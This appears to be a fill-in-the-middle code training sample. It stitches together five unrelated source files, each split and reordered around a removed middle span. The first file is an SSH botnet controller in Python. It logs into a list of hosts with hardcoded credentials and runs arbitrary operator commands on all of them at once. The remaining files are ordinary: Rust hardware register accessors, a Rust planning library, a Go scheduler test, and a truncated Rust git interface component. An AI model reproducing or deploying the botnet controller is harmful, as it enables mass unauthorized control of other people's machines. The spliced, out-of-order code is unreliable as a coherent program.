commandsshbotnet.py | #!usr/bin/env python
##########################################################
# #
# commandsshbotnet.py #
# author: @shipcod3 #
# inspired by the mass ssh botnet in " Violent Python " #
# #
##########################################################
import optparse
import pxssh
import sys
print "[*-*] Engine start..........\n"
print """
.___ ____ _____ .__.__
____ ____ _____ _____ _____ ____ __| _/ / _ \ ____ ____ ____ ________ __ ___________ _/ ____\____ |__| |
_/ ___\/ _ \ / \ / \\__ \ / \ / __ | > _ </\ _/ ___\/ _ \ / \ / ____/ | \_/ __ \_ __ \ \ __\\__ \ | | |
\ \__( <_> ) Y Y \ Y Y \/ __ \| | \/ /_/ | / <_\ \/ \ \__( <_> ) | < <_| | | /\ ___/| | \/ | | / __ \| | |__
\___ >____/|__|_| /__|_| (____ /___| /\____ | \_____\ \ \___ >____/|___| /\__ |____/ \___ >__| |__| (____ /__|____/
     \/          \/       \/     \/      \/     \/            \/        \/                  \/        |__|              \/     \/
"""
class Client:
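# Wraps an SSH connection to a single bot host; commands are sent over a persistent pxssh session.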
def __init__(self, host, user, password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()
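# Log in to the host over SSH with pxssh; returns the live session, or None if the login fails.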
def connect(self):
try:
s = pxssh.pxssh()
s.login(self.host, self.user, self.password)
return s
except:
print '[-] Error Connecting'
def send_command(self, cmd):
self.session.sendline(cmd)
self.session.prompt() #match the prompt
return self.session.before # print everything before the prompt
def usage():
print """
*********
Commands:
*********
python commandsshbotnet.py os <command> - For control
python commandsshbotnet.py info - Print information
"""
def main(argv):
if len(argv) < 2:
return usage()
arg_command = sys.argv[1]
def botnetCommand(command):
for client in botNet:
output = client.send_command(command)
print '[*] IP: ' + client.host
print '[+] Command: ' + output
def info(command):
for client in botNet:
output = client.send_command(command)
print '[*] IP: ' + client.host
print output.strip('uname -a;uptime')
def | (host, user, password):
client = Client(host, user, password)
botNet.append(client)
botNet = []
#add your host, user, and password here
addClient('127.0.0.1', 'celso', 'celso123') #sample config
addClient('127.0.0.2', 'celso', 'celso123')
if arg_command == "os":
try:
os_command = sys.argv[2]
botnetCommand(os_command)
except:
return usage()
elif arg_command == "info":
info("uname -a;uptime")
else:
return usage()
if __name__ == "__main__":
main(sys.argv)
###
#
# I have been contributing to Metasploit modules that pwn IRC botnets lately and will come up with a PoC
# for these kind of bots soon. More IRC Bot exploits: https://github.com/shipcod3/IRC-Bot-Hunters
# - shipcod3
###
| addClient |
afrh.rs | #[doc = "Reader of register AFRH"]
pub type R = crate::R<u32, super::AFRH>;
#[doc = "Writer for register AFRH"]
pub type W = crate::W<u32, super::AFRH>;
#[doc = "Register AFRH `reset()`'s with value 0"]
impl crate::ResetValue for super::AFRH {
type Type = u32;
#[inline(always)]
fn reset_value() -> Self::Type {
0
}
}
#[doc = "Reader of field `AFRH15`"]
pub type AFRH15_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH15`"]
pub struct AFRH15_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH15_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x0f << 28)) | (((value as u32) & 0x0f) << 28);
self.w
}
}
#[doc = "Reader of field `AFRH14`"]
pub type AFRH14_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH14`"]
pub struct AFRH14_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH14_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x0f << 24)) | (((value as u32) & 0x0f) << 24);
self.w
}
}
#[doc = "Reader of field `AFRH13`"]
pub type AFRH13_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH13`"]
pub struct AFRH13_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH13_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x0f << 20)) | (((value as u32) & 0x0f) << 20);
self.w
}
}
#[doc = "Reader of field `AFRH12`"]
pub type AFRH12_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH12`"]
pub struct AFRH12_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH12_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x0f << 16)) | (((value as u32) & 0x0f) << 16);
self.w
}
}
#[doc = "Reader of field `AFRH11`"]
pub type AFRH11_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH11`"]
pub struct AFRH11_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH11_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x0f << 12)) | (((value as u32) & 0x0f) << 12);
self.w
}
}
#[doc = "Reader of field `AFRH10`"]
pub type AFRH10_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH10`"]
pub struct AFRH10_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH10_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x0f << 8)) | (((value as u32) & 0x0f) << 8);
self.w
}
}
#[doc = "Reader of field `AFRH9`"]
pub type AFRH9_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH9`"]
pub struct AFRH9_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH9_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x0f << 4)) | (((value as u32) & 0x0f) << 4);
self.w
}
}
#[doc = "Reader of field `AFRH8`"]
pub type AFRH8_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH8`"]
pub struct AFRH8_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH8_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !0x0f) | ((value as u32) & 0x0f);
self.w
}
}
impl R {
#[doc = "Bits 28:31 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh15(&self) -> AFRH15_R {
AFRH15_R::new(((self.bits >> 28) & 0x0f) as u8)
}
#[doc = "Bits 24:27 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh14(&self) -> AFRH14_R {
AFRH14_R::new(((self.bits >> 24) & 0x0f) as u8)
}
#[doc = "Bits 20:23 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh13(&self) -> AFRH13_R {
AFRH13_R::new(((self.bits >> 20) & 0x0f) as u8)
}
#[doc = "Bits 16:19 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh12(&self) -> AFRH12_R {
AFRH12_R::new(((self.bits >> 16) & 0x0f) as u8)
}
#[doc = "Bits 12:15 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh11(&self) -> AFRH11_R {
AFRH11_R::new(((self.bits >> 12) & 0x0f) as u8)
}
#[doc = "Bits 8:11 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh10(&self) -> AFRH10_R {
AFRH10_R::new(((self.bits >> 8) & 0x0f) as u8)
}
#[doc = "Bits 4:7 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh9(&self) -> AFRH9_R {
AFRH9_R::new(((self.bits >> 4) & 0x0f) as u8)
}
#[doc = "Bits 0:3 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh8(&self) -> AFRH8_R {
AFRH8_R::new((self.bits & 0x0f) as u8)
}
}
impl W {
#[doc = "Bits 28:31 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh15(&mut self) -> AFRH15_W {
AFRH15_W { w: self }
}
#[doc = "Bits 24:27 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh14(&mut self) -> AFRH14_W {
AFRH14_W { w: self }
}
#[doc = "Bits 20:23 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh13(&mut self) -> AFRH13_W {
AFRH13_W { w: self }
}
#[doc = "Bits 16:19 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh12(&mut self) -> AFRH12_W |
#[doc = "Bits 12:15 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh11(&mut self) -> AFRH11_W {
AFRH11_W { w: self }
}
#[doc = "Bits 8:11 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh10(&mut self) -> AFRH10_W {
AFRH10_W { w: self }
}
#[doc = "Bits 4:7 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh9(&mut self) -> AFRH9_W {
AFRH9_W { w: self }
}
#[doc = "Bits 0:3 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh8(&mut self) -> AFRH8_W {
AFRH8_W { w: self }
}
}
| {
AFRH12_W { w: self }
} |
lib.rs | // Copyright 2017 Samuel Loretan <[email protected]> -- See LICENSE file
//! A Rust implementation of Orkin's Goal-Oriented Action-Planning (GOAP).
//!
//! ## Usage
//!
//! Add the rgoap dependency to `Cargo.toml`:
//!
//! ```toml
//! [dependencies]
//! rgoap = "0.1"
//! ```
//!
//! And use the crate as such:
//!
//! ```rust
//! extern crate rgoap;
//!
//! use rgoap::{State, Action, plan};
//!
//! # fn main() {
//! // The actions your planner will be allowed to use.
//! let mut walk_to_dog = Action::new("walk_to_dog".to_string(), 1);
//! walk_to_dog.pre_conditions.insert("dog_person".to_string(), true);
//! walk_to_dog.post_conditions.insert("near_dog".to_string(), true);
//!
//! let mut dog_wiggles_tail = Action::new("dog_wiggles_tail".to_string(), 1);
//! dog_wiggles_tail.pre_conditions.insert("dog_happy".to_string(), true);
//! dog_wiggles_tail.post_conditions.insert("tails_wiggling".to_string(), true);
//!
//! let mut pet_dog = Action::new("pet_dog".to_string(), 1);
//! pet_dog.pre_conditions.insert("near_dog".to_string(), true);
//! pet_dog.post_conditions.insert("dog_happy".to_string(), true);
//!
//! let possible_actions = [walk_to_dog, pet_dog, dog_wiggles_tail];
//!
//! // This is the initial state of the world.
//! let mut initial_state = State::new();
//! initial_state.insert("near_dog".to_string(), false);
//! initial_state.insert("dog_person".to_string(), true);
//! initial_state.insert("dog_happy".to_string(), false);
//! initial_state.insert("tails_wiggling".to_string(), false);
//!
//! // And this is the target state. Note that it doesn't have to include all of the states.
//! let mut goal_state = State::new();
//! goal_state.insert("tails_wiggling".to_string(), true);
//!
//! // Let's find which actions needs to happen to get there.
//! let planned_actions = plan(&initial_state, &goal_state, &possible_actions).unwrap();
//!
//! // Are the actions what we expected?
//! let planned_actions_names: Vec<String> =
//! planned_actions.iter().map(|&action| action.name.clone()).collect();
//! let expected_actions_names =
//! vec!["walk_to_dog".to_string(), "pet_dog".to_string(), "dog_wiggles_tail".to_string()];
//! assert_eq!(planned_actions_names, expected_actions_names);
//! # }
//! ```
#[macro_use]
#[cfg(feature = "use_serde")]
extern crate serde_derive;
#[cfg(feature = "use_serde")]
extern crate serde;
extern crate pathfinding;
use std::collections::BTreeMap;
use std::hash::{Hash, Hasher};
use pathfinding::prelude::astar;
/// A map of state atoms to their values.
pub type State = BTreeMap<String, bool>;
/// An action that can be used to influence the world state.
#[cfg_attr(feature = "use_serde", derive(Serialize, Deserialize))]
#[derive(PartialEq, Eq)]
pub struct Action {
pub name: String,
pub cost: usize,
pub pre_conditions: State,
pub post_conditions: State,
}
impl Action {
pub fn new(name: String, cost: usize) -> Action {
Action {
name: name,
cost: cost,
pre_conditions: State::new(),
post_conditions: State::new(),
}
}
}
/// A node in the planner graph.
#[derive(PartialEq, Eq, Clone)]
struct PlanNode<'a> {
current_state: State,
action: Option<&'a Action>,
}
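// Nodes are hashed on the action name plus the full world state so the A* search in `plan` can recognize equivalent nodes.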
impl<'a> Hash for PlanNode<'a> {
fn hash<H>(&self, state: &mut H)
where H: Hasher
{
if let Some(action) = self.action {
action.name.hash(state);
}
for (key, value) in &self.current_state {
key.hash(state);
value.hash(state);
}
}
}
impl<'a> PlanNode<'a> {
/// Makes an initial plan node without a parent.
fn initial(initial_state: &'a State) -> PlanNode<'a> {
PlanNode {
current_state: initial_state.clone(),
action: None,
}
}
/// Makes a plan node from a parent state and an action applied to that state.
fn child(parent_state: State, action: &'a Action) -> PlanNode<'a> {
let mut child = PlanNode {
current_state: parent_state.clone(),
action: Some(action),
};
// Applies the post-condition of the action applied on our parent state.
for (name, value) in &action.post_conditions {
child.current_state.insert(name.clone(), value.clone());
}
child
}
/// Returns all possible nodes from this current state, along with the cost to get there.
fn possible_next_nodes(&self, actions: &'a [Action]) -> Vec<(PlanNode<'a>, usize)> {
let mut nodes: Vec<(PlanNode<'a>, usize)> = vec![];
for action in actions {
if self.matches(&action.pre_conditions) {
nodes.push((PlanNode::child(self.current_state.clone(), action), action.cost));
}
}
nodes
}
/// Count the number of states in this node that aren't matching the given target.
fn mismatch_count(&self, target: &State) -> usize {
let mut count: usize = 0;
for (name, target_value) in target {
if let Some(current_value) = self.current_state.get(name) {
if current_value != target_value {
count += 1;
}
} else {
count += 1;
}
}
count
}
/// Returns `true` if the current node is a full match for the given target.
fn matches(&self, target: &State) -> bool {
self.mismatch_count(target) == 0
}
}
/// Formulates a plan to get from an initial state to a goal state using a set of allowed actions.
pub fn plan<'a>(initial_state: &'a State,
goal_state: &State,
allowed_actions: &'a [Action])
-> Option<Vec<&'a Action>> {
// Builds our initial plan node.
let start = PlanNode::initial(initial_state);
// Runs our search over the states graph.
if let Some((plan, _)) = astar(&start,
|ref node| node.possible_next_nodes(allowed_actions),
|ref node| node.mismatch_count(goal_state),
|ref node| node.matches(goal_state)) {
Some(plan.into_iter().skip(1).map(|ref node| node.action.unwrap()).collect())
} else {
None
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_edge_cases() {
let mut action = Action::new("action".to_string(), 1);
action.pre_conditions.insert("has_something".to_string(), true);
action.post_conditions.insert("is_winning".to_string(), true);
let actions = [action];
let mut initial_state = State::new();
initial_state.insert("has_something".to_string(), false);
initial_state.insert("is_winning".to_string(), false);
// No viable plan.
{
let mut goal_state = State::new();
goal_state.insert("is_winning".to_string(), true);
let plan = plan(&initial_state, &goal_state, &actions);
assert!(plan.is_none());
}
// The goal state is already reached in the initial state.
{
let mut goal_state = State::new();
goal_state.insert("is_winning".to_string(), false);
let plan = plan(&initial_state, &goal_state, &actions);
assert!(plan.unwrap().len() == 0);
}
// The goal state uses a state missing from the initial state.
{
let mut goal_state = State::new();
goal_state.insert("is_losing".to_string(), false);
let plan = plan(&initial_state, &goal_state, &actions);
assert!(plan.is_none());
}
}
}
#[cfg(test)]
#[cfg(feature = "use_serde")]
mod tests_with_serde {
extern crate serde_json;
use super::*;
use std::path::Path;
use std::fs;
/// A test case
#[derive(Deserialize)]
struct TestCase {
#[serde(skip_deserializing)]
case_name: String,
actions: Vec<Action>,
initial_state: State,
goal_state: State,
expected_actions: Vec<String>,
}
impl TestCase {
/// Loads a test case from a JSON file.
fn from_case_file(path: &Path) -> TestCase {
let file = fs::File::open(path).unwrap(); | let mut case: TestCase = serde_json::from_reader(file).unwrap();
case.case_name = String::from(path.file_name().unwrap().to_str().unwrap());
case
}
/// Checks if the computed plan matches the expectation.
fn assert_plan(&self) {
let plan = plan(&self.initial_state, &self.goal_state, &self.actions);
if let Some(actions_list) = plan {
let actions_names: Vec<String> =
actions_list.iter().map(|&action| action.name.clone()).collect();
if self.expected_actions != actions_names {
panic!("{} failed: expected {:?}, got {:?}",
self.case_name,
self.expected_actions,
actions_names);
}
} else {
if self.expected_actions.len() > 0 {
panic!("{} failed: expected {:?}, got no plan",
self.case_name,
self.expected_actions);
}
}
}
}
#[test]
fn run_test_files() {
let paths = fs::read_dir("./data").unwrap();
for path in paths {
let case = TestCase::from_case_file(path.unwrap().path().as_path());
case.assert_plan();
}
}
} | |
scheduler_test.go | // Copyright 2018 Bull S.A.S. Atos Technologies - Bull, Rue Jean Jaures, B.P.68, 78340, Les Clayes-sous-Bois, France.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package scheduler
import (
"context"
"encoding/json"
"path"
"strconv"
"testing"
"time"
"github.com/hashicorp/consul/api"
"github.com/stretchr/testify/require"
"github.com/ystia/yorc/v4/events"
"github.com/ystia/yorc/v4/helper/consulutil"
"github.com/ystia/yorc/v4/prov"
"github.com/ystia/yorc/v4/prov/scheduling"
"github.com/ystia/yorc/v4/tasks"
)
func testRegisterAction(t *testing.T, client *api.Client) {
t.Parallel()
deploymentID := "dep-" + t.Name()
ti := 1 * time.Second
actionType := "test-action"
action := &prov.Action{ActionType: actionType, Data: map[string]string{"key1": "val1", "key2": "val2", "key3": "val3"}}
id, err := scheduling.RegisterAction(client, deploymentID, ti, action)
require.Nil(t, err, "Unexpected error while registering action")
require.NotEmpty(t, id, "id is not expected to be empty")
// Check action has been registered
sca, err := defaultScheduler.buildScheduledAction(id)
require.Nil(t, err, "Unexpected error while building scheduled action from action id")
require.NotNil(t, sca, "scheduled action is not required to be nil")
require.Equal(t, actionType, sca.ActionType, "Unexpected value for action type")
require.Equal(t, id, sca.ID, "Unexpected value for ID")
require.Equal(t, 3, len(sca.Data), "Unexpected nb of data")
require.Equal(t, "val1", sca.Data["key1"], "Unexpected value for Data[key1]")
require.Equal(t, "val2", sca.Data["key2"], "Unexpected value for Data[key2]")
require.Equal(t, "val3", sca.Data["key3"], "Unexpected value for Data[key3]")
}
func testProceedScheduledAction(t *testing.T, client *api.Client) {
t.Parallel()
deploymentID := "dep-" + t.Name()
ti := 1 * time.Second
actionType := "test-action"
action := &prov.Action{ActionType: actionType, Data: map[string]string{"key1": "val1", "key2": "val2", "key3": "val3"}}
id, err := scheduling.RegisterAction(client, deploymentID, ti, action)
require.Nil(t, err, "Unexpected error while registering action")
require.NotEmpty(t, id, "id is not expected to be empty")
closeCh := make(chan struct{})
defer close(closeCh)
go func() {
var latestIndex uint64
for {
select {
case <-closeCh:
return
default:
}
kvp, meta, err := client.KV().Get(path.Join(consulutil.SchedulingKVPrefix, "actions", id, "latestTaskID"), &api.QueryOptions{WaitIndex: latestIndex})
if err != nil {
t.Logf("%v", err)
continue
}
if latestIndex == meta.LastIndex {
continue
}
// set the related task to done asap to reschedule them
if kvp != nil && len(kvp.Value) > 0 {
taskID := string(kvp.Value)
p := &api.KVPair{Key: path.Join(consulutil.TasksPrefix, taskID, "status"), Value: []byte(strconv.Itoa(int(tasks.TaskStatusDONE)))}
client.KV().Put(p, nil)
}
}
}()
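// check asserts that `index` tasks exist for this deployment and that each one carries the action type and data registered with the scheduled action.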
var check = func(index int, cpt *int) {
*cpt++
// Check related tasks have been created
keys, _, err := client.KV().Keys(consulutil.TasksPrefix+"/", "/", nil)
require.Nil(t, err, "Unexpected error while checking actions tasks")
depTask := 0
for _, key := range keys {
kvp, _, err := client.KV().Get(key+"targetId", nil)
if kvp != nil && string(kvp.Value) == deploymentID {
depTask++
kvp, _, err = client.KV().Get(key+"data/actionType", nil)
require.Nil(t, err, "Unexpected error while getting action type")
require.NotNil(t, kvp, "kvp is nil for action type") | kvp, _, err = client.KV().Get(key+"data/key1", nil)
require.Nil(t, err, "Unexpected error while getting key1")
require.NotNil(t, kvp, "kvp is nil for key1")
require.Equal(t, string(kvp.Value), "val1")
kvp, _, err = client.KV().Get(key+"data/key2", nil)
require.Nil(t, err, "Unexpected error while getting key2")
require.NotNil(t, kvp, "kvp is nil for key2")
require.Equal(t, string(kvp.Value), "val2")
kvp, _, err = client.KV().Get(key+"data/key3", nil)
require.Nil(t, err, "Unexpected error while getting key3")
require.NotNil(t, kvp, "kvp is nil for key3")
require.Equal(t, string(kvp.Value), "val3")
}
}
require.Equal(t, index, depTask, "Unexpected nb of tasks")
}
ind := 0
checkCpt := 0
ticker := time.NewTicker(ti)
time.Sleep(2 * time.Second)
for i := 0; i <= 2; i++ {
select {
case <-ticker.C:
ind++
check(ind, &checkCpt)
if ind == 3 {
ticker.Stop()
}
}
}
require.Equal(t, checkCpt, 3, "unexpected number of checks done")
}
func testProceedScheduledActionWithFirstActionStillRunning(t *testing.T, client *api.Client) {
t.Parallel()
ctx := context.Background()
deploymentID := "dep-" + t.Name()
ti := 1 * time.Second
actionType := "test-action"
nodeName := "my-node"
opeName := "my-op"
interfaceName := "my-inter"
taskID := "orig-taskID"
wfName := "my-wf"
action := &prov.Action{ActionType: actionType, Data: map[string]string{"key1": "val1", "key2": "val2", "key3": "val3"},
AsyncOperation: prov.AsyncOperation{DeploymentID: deploymentID, NodeName: nodeName, Operation: prov.Operation{Name: interfaceName + "." + opeName}, TaskID: taskID, WorkflowName: wfName}}
id, err := scheduling.RegisterAction(client, deploymentID, ti, action)
require.Nil(t, err, "Unexpected error while registering action")
require.NotEmpty(t, id, "id is not expected to be empty")
closeCh := make(chan struct{})
defer close(closeCh)
go func() {
var latestIndex uint64
for {
select {
case <-closeCh:
return
default:
}
kvp, meta, err := client.KV().Get(path.Join(consulutil.SchedulingKVPrefix, "actions", id, "latestTaskID"), &api.QueryOptions{WaitIndex: latestIndex})
if err != nil {
t.Logf("%v", err)
continue
}
if latestIndex == meta.LastIndex {
continue
}
// Set the task status to RUNNING in order to not reschedule another task
if kvp != nil && len(kvp.Value) > 0 {
taskID := string(kvp.Value)
p := &api.KVPair{Key: path.Join(consulutil.TasksPrefix, taskID, "status"), Value: []byte(strconv.Itoa(int(tasks.TaskStatusRUNNING)))}
client.KV().Put(p, nil)
}
}
}()
var check = func(index int, cpt *int) {
*cpt++
// Check related tasks have been created
keys, _, err := client.KV().Keys(consulutil.TasksPrefix+"/", "/", nil)
require.Nil(t, err, "Unexpected error while checking actions tasks")
depTask := 0
for _, key := range keys {
kvp, _, err := client.KV().Get(key+"targetId", nil)
if kvp != nil && string(kvp.Value) == deploymentID {
depTask++
kvp, _, err = client.KV().Get(key+"data/actionType", nil)
require.Nil(t, err, "Unexpected error while getting action type")
require.NotNil(t, kvp, "kvp is nil for action type")
require.Equal(t, string(kvp.Value), actionType)
kvp, _, err = client.KV().Get(key+"data/key1", nil)
require.Nil(t, err, "Unexpected error while getting key1")
require.NotNil(t, kvp, "kvp is nil for key1")
require.Equal(t, string(kvp.Value), "val1")
kvp, _, err = client.KV().Get(key+"data/key2", nil)
require.Nil(t, err, "Unexpected error while getting key2")
require.NotNil(t, kvp, "kvp is nil for key2")
require.Equal(t, string(kvp.Value), "val2")
kvp, _, err = client.KV().Get(key+"data/key3", nil)
require.Nil(t, err, "Unexpected error while getting key3")
require.NotNil(t, kvp, "kvp is nil for key3")
require.Equal(t, string(kvp.Value), "val3")
}
}
require.Equal(t, index, depTask, "Unexpected nb of tasks")
}
ind := 0
checkCpt := 0
ticker := time.NewTicker(ti)
time.Sleep(2 * time.Second)
for i := 0; i <= 2; i++ {
select {
case <-ticker.C:
ind++
// as the task is still running, no other task is created
check(1, &checkCpt)
if ind == 3 {
ticker.Stop()
}
}
}
require.Equal(t, checkCpt, 3, "unexpected number of checks done")
logs, _, err := events.LogsEvents(ctx, deploymentID, 0, 5*time.Second)
require.NoError(t, err, "Could not retrieve logs")
require.Equal(t, true, len(logs) > 0, "expected at least one logged event")
var data map[string]interface{}
err = json.Unmarshal(logs[0], &data)
require.Nil(t, err)
require.Equal(t, taskID, data["executionId"], "unexpected event executionID")
require.Equal(t, wfName, data["workflowId"], "unexpected event workflowId")
require.Equal(t, nodeName, data["nodeId"], "unexpected event nodeId")
require.Equal(t, interfaceName, data["interfaceName"], "unexpected event interfaceName")
require.Equal(t, opeName, data["operationName"], "unexpected event operationName")
}
func testProceedScheduledActionWithBadStatusError(t *testing.T, client *api.Client) {
t.Parallel()
deploymentID := "dep-" + t.Name()
ti := 1 * time.Second
actionType := "test-action"
action := &prov.Action{ActionType: actionType, Data: map[string]string{"key1": "val1", "key2": "val2", "key3": "val3"}}
id, err := scheduling.RegisterAction(client, deploymentID, ti, action)
require.Nil(t, err, "Unexpected error while registering action")
require.NotEmpty(t, id, "id is not expected to be empty")
closeCh := make(chan struct{})
defer close(closeCh)
go func() {
var latestIndex uint64
for {
select {
case <-closeCh:
return
default:
}
kvp, meta, err := client.KV().Get(path.Join(consulutil.SchedulingKVPrefix, "actions", id, "latestTaskID"), &api.QueryOptions{WaitIndex: latestIndex})
if err != nil {
t.Logf("%v", err)
continue
}
if latestIndex == meta.LastIndex {
continue
}
// Set the task status to RUNNING in order to not reschedule another task
if kvp != nil && len(kvp.Value) > 0 {
taskID := string(kvp.Value)
p := &api.KVPair{Key: path.Join(consulutil.TasksPrefix, taskID, "status"), Value: []byte("BAD")}
client.KV().Put(p, nil)
}
}
}()
var check = func(index int, cpt *int) {
*cpt++
// Check related tasks have been created
keys, _, err := client.KV().Keys(consulutil.TasksPrefix+"/", "/", nil)
require.Nil(t, err, "Unexpected error while checking actions tasks")
depTask := 0
for _, key := range keys {
kvp, _, err := client.KV().Get(key+"targetId", nil)
if kvp != nil && string(kvp.Value) == deploymentID {
depTask++
kvp, _, err = client.KV().Get(key+"data/actionType", nil)
require.Nil(t, err, "Unexpected error while getting action type")
require.NotNil(t, kvp, "kvp is nil for action type")
require.Equal(t, string(kvp.Value), actionType)
kvp, _, err = client.KV().Get(key+"data/key1", nil)
require.Nil(t, err, "Unexpected error while getting key1")
require.NotNil(t, kvp, "kvp is nil for key1")
require.Equal(t, string(kvp.Value), "val1")
kvp, _, err = client.KV().Get(key+"data/key2", nil)
require.Nil(t, err, "Unexpected error while getting key2")
require.NotNil(t, kvp, "kvp is nil for key2")
require.Equal(t, string(kvp.Value), "val2")
kvp, _, err = client.KV().Get(key+"data/key3", nil)
require.Nil(t, err, "Unexpected error while getting key3")
require.NotNil(t, kvp, "kvp is nil for key3")
require.Equal(t, string(kvp.Value), "val3")
}
}
require.Equal(t, index, depTask, "Unexpected nb of tasks")
}
ind := 0
checkCpt := 0
ticker := time.NewTicker(ti)
time.Sleep(2 * time.Second)
for i := 0; i <= 2; i++ {
select {
case <-ticker.C:
ind++
// as the proceed returns an error, the scheduler will stop and only one task will be created
check(1, &checkCpt)
if ind == 3 {
ticker.Stop()
}
}
}
require.Equal(t, checkCpt, 3, "unexpected number of checks done")
}
func testUnregisterAction(t *testing.T, client *api.Client) {
t.Parallel()
deploymentID := "dep-" + t.Name()
ti := 1 * time.Second
actionType := "test-action"
action := &prov.Action{ActionType: actionType, Data: map[string]string{"key1": "val1", "key2": "val2", "key3": "val3"}}
id, err := scheduling.RegisterAction(client, deploymentID, ti, action)
require.Nil(t, err, "Unexpected error while registering action")
require.NotEmpty(t, id, "id is not expected to be empty")
err = scheduling.UnregisterAction(client, id)
require.Nil(t, err, "Unexpected error while unregistering action")
kvp, _, err := client.KV().Get(path.Join(consulutil.SchedulingKVPrefix, "actions", id, ".unregisterFlag"), nil)
require.Nil(t, err, "Unexpected error while getting flag for removal")
require.NotNil(t, kvp, "kvp is nil")
require.Equal(t, "true", string(kvp.Value), "unregisterFlag is not set to true")
} | require.Equal(t, string(kvp.Value), actionType)
|
compare_commits.rs | use super::{
command_pump, event_pump, visibility_blocking, CommandBlocking,
CommandInfo, CommitDetailsComponent, Component, DiffComponent,
DrawableComponent, EventState, InspectCommitOpen,
};
use crate::{
accessors,
keys::SharedKeyConfig,
queue::{InternalEvent, Queue, StackablePopupOpen},
strings,
ui::style::SharedTheme,
};
use anyhow::Result;
use asyncgit::{
sync::{self, diff::DiffOptions, CommitId, RepoPathRef},
AsyncDiff, AsyncGitNotification, CommitFilesParams, DiffParams,
DiffType,
};
use crossbeam_channel::Sender;
use crossterm::event::Event;
use tui::{
backend::Backend,
layout::{Constraint, Direction, Layout, Rect},
widgets::Clear,
Frame,
};
pub struct CompareCommitsComponent {
repo: RepoPathRef,
open_request: Option<InspectCommitOpen>,
diff: DiffComponent,
details: CommitDetailsComponent,
git_diff: AsyncDiff,
visible: bool,
key_config: SharedKeyConfig,
queue: Queue,
}
impl DrawableComponent for CompareCommitsComponent {
fn draw<B: Backend>(
&self,
f: &mut Frame<B>,
rect: Rect,
) -> Result<()> {
if self.is_visible() {
let percentages = if self.diff.focused() {
(30, 70)
} else {
(50, 50)
};
let chunks = Layout::default()
.direction(Direction::Horizontal)
.constraints(
[
Constraint::Percentage(percentages.0),
Constraint::Percentage(percentages.1),
]
.as_ref(),
)
.split(rect);
f.render_widget(Clear, rect);
self.details.draw(f, chunks[0])?;
self.diff.draw(f, chunks[1])?;
}
Ok(())
}
}
impl Component for CompareCommitsComponent {
fn commands(
&self,
out: &mut Vec<CommandInfo>,
force_all: bool,
) -> CommandBlocking |
fn event(&mut self, ev: Event) -> Result<EventState> {
if self.is_visible() {
if event_pump(ev, self.components_mut().as_mut_slice())?
.is_consumed()
{
if !self.details.is_visible() {
self.hide_stacked(true);
}
return Ok(EventState::Consumed);
}
if let Event::Key(e) = ev {
if e == self.key_config.keys.exit_popup {
